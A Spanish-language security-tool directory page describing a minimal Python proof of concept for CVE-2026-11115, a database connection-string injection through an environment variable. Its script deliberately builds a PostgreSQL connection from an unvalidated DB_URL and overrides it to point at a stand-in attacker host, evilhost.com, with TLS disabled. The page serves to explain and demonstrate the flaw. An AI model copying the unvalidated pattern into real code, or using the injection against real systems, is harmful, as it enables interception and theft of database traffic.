Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-11115-Database-Connection-String-Injection-via-Env-Variable — Prueba de concepto mínima en Python para CVE-2026-11115, que demuestra la inyección de cadenas de conexión a bases de datos mediante variables de entorno y la redirección a hosts de PostgreSQL controlados por el atacante. | Kitploit
Herramientas/GitHubGitHub/george0papasotiriou/cve-2026-11115-database-connection-string-injection-via-env-variable
Análisis de VulnerabilidadesExplotaciónPruebas de PenetraciónMala ConfiguraciónAprendizaje y EducaciónSeguridad de Bases de Datos
GitHubgeorge0papasotiriou/cve-2026-11115-database-connection-string-injection-via-env-variable

CVE-2026-11115-Database-Connection-String-Injection-via-Env-Variable

Prueba de concepto mínima en Python para CVE-2026-11115, que demuestra la inyección de cadenas de conexión a bases de datos mediante variables de entorno y la redirección a hosts de PostgreSQL controlados por el atacante.

Ver Repositorio
6hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-11115 – Inyección de cadena de conexión de base de datos a través de variable de entorno

Código del programa (Python)

root@kitploit:~
# db_connector.py - Constructs DB connection string from environment
import os, psycopg2

def connect():
    # Reads DB_URL; attacker can override via environment injection if they control an env var
    db_url = os.getenv('DB_URL', 'postgresql://user:pass@localhost/db')
    # Vulnerability: no validation; allows extra parameters like ?application_name=... but also SSRF or auth bypass
    conn = psycopg2.connect(db_url)
    return conn

# Simulate an attacker who can set environment variable:
os.environ['DB_URL'] = "postgresql://user:pass@localhost/db?host=evilhost.com&sslmode=disable"
c = connect()  # Connects to attacker-controlled host!
print("Connected to attacker DB.")

CVE-2026-11115 – Inyección de cadena de conexión de base de datos

Severity: High

Resumen

Una aplicación construye su cadena de conexión de base de datos a partir de una variable de entorno sin validación. Si un atacante puede influir en esa variable (p. ej., mediante una falsificación de solicitud del lado del servidor o una configuración incorrecta del pipeline de CI/CD), puede redirigir la conexión de base de datos a su propio servidor, interceptando o modificando datos.

Detalles de la vulnerabilidad

  • Tipo: Inyección de cadena de conexión
  • Impacto: Exfiltración de datos, man-in-the-middle.
  • Causa raíz: La URI completa de conexión se obtiene de una variable de entorno, y se pueden agregar parámetros adicionales (como host) para sobrescribir el host original.

Demostración del exploit

Ejecute la simulación:

root@kitploit:~
pip install psycopg2-binary
python db_connector.py

El programa intenta conectarse a evilhost.com en lugar de localhost.

Descargar herramienta